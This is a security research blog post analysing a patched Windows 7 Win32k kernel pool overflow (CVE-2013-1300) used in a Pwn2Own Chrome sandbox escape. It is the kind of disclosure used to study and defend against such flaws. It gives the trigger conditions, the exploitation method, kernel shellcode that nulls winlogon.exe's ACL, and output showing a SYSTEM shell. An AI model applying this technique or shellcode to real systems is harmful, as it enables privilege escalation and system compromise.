MWR Labs took part in Pwn2Own 2013, demonstrating a full sandbox escape against Google Chrome. Two exploits were used in the demonstration:

  • A type confusion in WebKit, Chrome’s rendering Engine (CVE-2013-0912). We blogged about this vulnerability previously.
  • A kernel pool overflow in Win32k which allowed us to break out of the sandbox by compromising the underlying operating system (CVE-2013-1300).

This blog post discusses the details of the kernel vulnerability and exploit. The specific vulnerability was fixed by Microsoft in MS013-053.

The details of this vulnerability were first presented at the Nordic Sec Conf in Iceland (see our review of the conference). The slides of our presentation can be downloaded here.

Fuzzing the Windows Kernel

The specific vulnerability was found using MWR Labs’ Windows Kernel fuzzer. The fuzzer found several crashes, and specifically triggered a number of crashes with the following signature:

nt!ExpReleasePoolQuota+0x21:
82aca424 8a07 mov al,byte ptr [edi] ds:0023:00410041=??
00000008 ffb80530 00000000 nt!ExpReleasePoolQuota+0x21
fd6b7168 00000000 ffb80530 nt!ExFreePoolWithTag+0x779
ffb80530 00000000 2ba8aa2a win32k!UnlinkSendListSms+0x70
00243c78 0000000d 00000008 win32k!xxxInterSendMsgEx+0xd0a
fe243c78 0000000d 00000008 win32k!xxxSendMessageTimeout+0x13b
fe243c78 0000000d 00000008 win32k!xxxSendMessageEx+0xec
fe243c78 0000000d 00000008 win32k!NtUserfnOUTSTRING+0xa7
0001037c 0000000d 00000008 win32k!NtUserMessageCall+0xc9
0001037c 0000000d 00000008 nt!KiFastCallEntry+0x12a

These crashes caught our attention as they indicated that pool memory had been corrupted. Looking at the crash dumps, we observed that the following undocumented system call triggered the crash:

NtUserMessageCall(
    HWND,
    WM_GETTEXT,
    0x8,        // Buffer size
    ptr,        // user mode buffer
    0x0,
    0x2b3,
    0x2);       // ASCII boolean/flag

A few more requirements had to be satisfied in order to trigger the bug:

  1. The message had to be sent between separate threads or processes.
  2. The receiving window had to be an ASCII window (created with CreateWindowExA).
  3. The receiving Window procedure had to send a reply to the WM_GETTEXT message which is larger than the buffer size divided by two.
  4. The last argument of NTUserMessageCall had to be an even number, which was greater than 0.

Specifically, the last requirement was interesting. We’ll see why a little later in this blog post.

The Vulnerability

When sending messages between threads in Windows, the xxxInterSendMsgEx method is responsible for forwarding the messages from the sending thread to the receiving thread. For certain message types that require a buffer to be returned (such as a string) it will calculate the required buffer size and allocate the buffer with a call to Win32AllocPoolWithQuota. Two factors are taken into account in order to determine the buffer size:

  • The type of the message.
  • The arguments to the system call responsible for sending the message. Of particular interest for responses returning strings is whether it expects an ASCII or WCHAR value.

The allocated buffer is then filled in by the receiving window while it is polling for outstanding messages. For our specific message, the kernel stack will look as follows:

a9de17d0 825c4759 a9de1850 a9dd9a84 00000008 win32k!CopyOutputString
a9de1aa4 82625d85 fe2389a0 0000000d 00000008 win32k!SfnOUTSTRING+0x336
a9de1aec 825f5ad1 0a2389a0 0000000d 00000008 win32k!xxxSendMessageToClient+0x175
a9de1b68 82638034 fd96c5a0 2bad6b5a 0171fed8 win32k!xxxReceiveMessage+0x3b8
a9de1bb8 8263b7e6 a9de1be8 000025ff 00000000 win32k!xxxRealInternalGetMessage+0x252
a9de1c1c 82a4e89a 0171fed8 00000000 00000000 win32k!NtUserGetMessage+0x3f
a9de1c1c 77677094 0171fed8 00000000 00000000 nt!KiFastCallEntry+0x12a
0171ff00 7769377b 00000000 76fed4be 00000000 ntdll!KiFastSystemCallRet
0171ff40 7769374e 013d1340 00000000 00000000 ntdll!__RtlUserThreadStart+0x70
0171ff58 00000000 013d1340 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b

CopyOutputString will fill in the kernel buffer, converting the value returned from the window procedure where applicable. The appropriate conversion is determined from the type of the receiving window (whether the window is ASCII or WCHAR) and the last argument passed to NTUserMessageCall (indicating if it is an ASCII or WCHAR message). This results in four potential cases:

  1. Both ASCII: Use strncpycch to copy the data.
  2. Both WCHAR: Use wcsncpycch to copy the data.
  3. ASCII target window and WCHAR requested by system call: Convert the string using MBToWCSEx.
  4. WCHAR target window and ASCII requested by system call: Convert the string using WCSToMBEx.

It should be obvious that the action that is taken must always match the size of the buffer that was previously allocated in xxxInterSendMsgEx. However, prior to the release of the patches in MS13-053, this was not the case.

The problem existed in a discrepancy between the interpretation of the last argument to NtUserMessageCall by the allocation function and the function performing the copy operation. The allocation function treats the last argument as a Boolean value. In this case, 0 is considered false, and indicates a WCHAR value. Anything else will be interpreted as true, and indicates an ASCII value. However, the function performing the copy operation interpreted the last argument to NtUserMessageCall as a bit flag by examining the least significant bit, and used this to indicate if the value should be interpreted as ASCII or WCHAR.

In cases where the last argument to NtUserMessageCall is an even number and is non-zero, the allocation function and the function performing the copy operation will interpret this value differently. As an example, if we passed the value 2 as the last argument, the allocation function would treat this as Boolean true, and allocate a buffer big enough to hold the ASCII representation of the string. When the function performing the copy operation is called, it would copy the string as a WCHAR value, because the least significant bit of the value 2 is not set.

The allocated buffer will always be freed later in the xxxInterSendMsgEx function, and in most cases a crash will be triggered if the memory adjacent to the buffer was corrupted.

The Exploit

The buffer that we are able to overflow was allocated using the Win32AllocPoolWithQuota function, which stores a pointer to the relevant EPROCESS structure in order to track allocations for the current process. On our target platform (Windows 7 32-bit) this results in the following buffer layout, with the EPROCESS pointer conveniently placed after our data:

Buffer layout

Tarjei Mandt’s Kernel Pool Exploitation on Windows 7 paper gave us a few pointers on how to exploit this issue.

The block size for the pool allocation (including the EPROCESS pointer) is rounded up to the nearest 16 byte boundary, which we are able to specify through the third argument to NtUserMessageCall. The maximum size of the write to the buffer will be twice the allocated size due to the WCHAR representation of the value being twice the length of the ASCII value. Ideally, to preserve reliability, we want to overwrite the EPROCESS pointer without corrupting any adjacent memory. In order to achieve this, we chose a buffer size of 8, which will result in an allocation of size 12 (8 + size of the EPROCESS pointer), and will be rounded up to 16. The copy operation will copy double the size of the buffer we requested, which in this case is also 16. This ensures that we will corrupt the EPROCESS pointer without affecting any adjacent pool objects.

Due to the conversion being from ASCII (not UTF8) to WCHAR, we were only able to overwrite the pointer with a limited set of values of the format 0x00xx00yy, where xx and yy are arbitrary values we control. After the copy operation, the buffer layout would be as follows:

Buffer layout after copy operation

This allowed us to point the EPROCESS pointer into user mode memory, and fake this structure at an address we control. The EPROCESS structure contains a lot of fields, many of which are uninteresting for the purposes of exploitation. However, when our buffer is freed, several values are modified that are referenced using the EPROCESS pointer. Specifically, a pointer in the EPROCESS structure is used to locate the QuotaBlock pointer for that process, as shown below:

kd> dt ntkrpamp!_EPROCESS
...
+0x0d4 QuotaBlock : Ptr32 _EPROCESS_QUOTA_BLOCK
...

As we control this value, we are also able to direct the pointer to the EPROCESS_QUOTA_BLOCK into controlled user memory. The EPROCESS_QUOTA_BLOCK is defined as follows:

typedef struct _EPROCESS_QUOTA_BLOCK {
    EPROCESS_QUOTA_ENTRY QuotaEntry[3];
    LIST_ENTRY QuotaList;
    ULONG ReferenceCount;
    ULONG ProcessCount;
} EPROCESS_QUOTA_BLOCK, *PEPROCESS_QUOTA_BLOCK;

Amongst other things, the ReferenceCount value will be decremented on a free of a buffer. It is important to remember that although we are operating on memory allocated in user mode, the decrementing of values during a free will be performed in the context of kernel mode, so we are able to decrement any value, including those in kernel memory. We are also able to trigger this decrement an arbitrary number of times, allowing us more flexibility.

So, what can we find in kernel mode that will result in reliable code execution when decremented one or more times?

A known trick to retrieve pointers to kernel mode objects from user mode in Windows (prior to Windows 8) is to use the gSharedInfo table in user32.dll, which is at a static address and is mapped into all processes on the system. For the exploit, we can create a new win32k window object and retrieve the kernel mode address using this trick. Once we know this value, we can search for a value to decrement within this object’s structure. We decided to decrement the state value, which is a bit mask, and is outlined below:

kd> dt win32k!tagWND
+0x000 head : _THRDESKHEAD
+0x014 state : Uint4B
+0x014 bHasMeun : Pos 0, 1 Bit
...
+0x014 bServerSideWindowProc : Pos 18, 1 Bit
+0x014 bAnsiWindowProc : Pos 19, 1 Bit
+0x014 bBeingActivated : Pos 20, 1 Bit
...
+0x014 bMaximizesToMonitor : Pos 30, 1 Bit
+0x014 bDestroyed : Pos 31, 1 Bit
...
+0x060 lpfnWndProc : Ptr32 long

Interestingly, one of the flags in this bit mask is the bServerSideWindowProc flag. This flag indicates whether the window procedure associated with the current window should be executed in user mode or in kernel mode. If this flag is set to 1, the window procedure (which we define during window creation) will be executed without a context switch, and consequently will run in kernel mode. In order to ensure we have decremented the value enough to set this flag, our window procedure checks whether it is being run in kernel mode on entry:

WORD um=0;
__asm {
    mov ax, cs
    mov um, ax
}
if(um == 0x1b) {
    // USER MODE
} else {
    // KERNEL MODE CODE EXECUTION

If it is executed in user mode, we bail and trigger an additional decrement. If it is executed in kernel mode, it will execute our shellcode which will allow us to elevate privileges from user mode. In order to achieve this we decided to implement a neat trick detailed in Easy local Windows Kernel exploitation by Cesar Cerrudo. The trick involves nulling out the ACL of a SYSTEM process so that we are able to inject a thread into the privileged process from a less privileged process (in this case, the chrome render process, which runs under the “untrusted” integrity level). The kernel mode shellcode retrieves the KPROCESS structure from the window object and will then continue iterating over the KPROCESS linked list until it finds the process to remove the ACL from:

mov eax, hwnd      // WND
mov eax, [eax+8]   // THREADINFO
mov eax, [eax]     // ETHREAD
mov eax, [eax+0x150] // KPROCESS
mov eax, [eax+0xb8]  // flink
procloop:
lea edx, [eax-0xb8]  // KPROCESS
mov eax, [eax]
add edx, 0x16c       // module name
cmp dword ptr [edx], 0x6c6e6977 // "winl" for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr [edx], 0x0  // NULL ACL

In our exploit, we used winlogon.exe, as it has SYSTEM privileges and runs on the default desktop. This was necessary to ensure that the SYSTEM-level calc.exe would be visible for all to see. :)

When run on an unpatched 32-bit Windows 7 machine, our exploit shows the following output:

.mMMMMMm.    mMMm    M   WWW W     W   RRRRR
mMMMMMMMMMMM. MM MM   W     W     W   R   R
/MMMM- -MM.   MM MM   W     W     W   R   R
/MMM. _ \/ ^  M  M  M  W   W W   W   RRRR
|M. aRRr /W|  M  M  M  W   W W   W   R   R
\/ .. ^^^ wWWW| M  M  M   W W   W    R   R
/WW\. .wWWWW/  M  M  M   W W   W    R   R
|WWWWWWWWWWW/
.WWWWWW.

[+] This is schlamperei
[-] kernel class registered: 00001338
[-] kernel proc called from usermode. msg: 0x0024, wparam: 0x00000000, lparam: 0x001bf310
[-] kernel proc called from usermode. msg: 0x0081, wparam: 0x00000000, lparam: 0x001bf308
[-] kernel proc called from usermode. msg: 0x0083, wparam: 0x00000000, lparam: 0x001bf330
[-] kernel proc called from usermode. msg: 0x0001, wparam: 0x00000000, lparam: 0x001bf2fc
[-] kernel window created: 0002028A
[-] user32 is at 76F40000
[-] sharedinfo is at 76FA9440
[-] ahelist is at 003F0000
[-] index of for HANDLE 0002028a is 028a
[-] address of user object is FE230508
[-] resolved NtAllocateVirtualMemory at 0x776752D8
[-] trying to find suitable address for EPROCESS structure
[-] failed to allocate page at 0x200000. Trying next page
[-] failed to allocate page at 0x210000. Trying next page
[-] failed to allocate page at 0x220000. Trying next page
[+] successfully allocated page at 0x230000
[-] creating window thread
[-] sleeping for window thread to be created
[-] window thread started
[-] ansi class registered: 00001337
[-] ansi window created: 000702AA
[-] triggering the vulnerability multiple times
[-] triggering our now kernel mode wndproc
[+] Success \o/ winlogon pid=1128
[-] handle to winlogon: 0x005c
[-] allocated executable page in winlogon @ 0x9f0000
[-] copying and executing shellcode
[+] enjoy your SYSTEM shell

We will release the full exploit code in a few weeks, until then we will leave it as an exercise to the interested reader to implement an exploit for the vulnerability.

Conclusion

The kernel is one of the main weaknesses in modern sandbox implementations. Windows 8 and 8.1 have introduced additional features and protections which would prevent our exploit from working on these platforms. We are looking forward to Pwn2Own 2014 to see how successful these protections are in preventing sandbox escapes.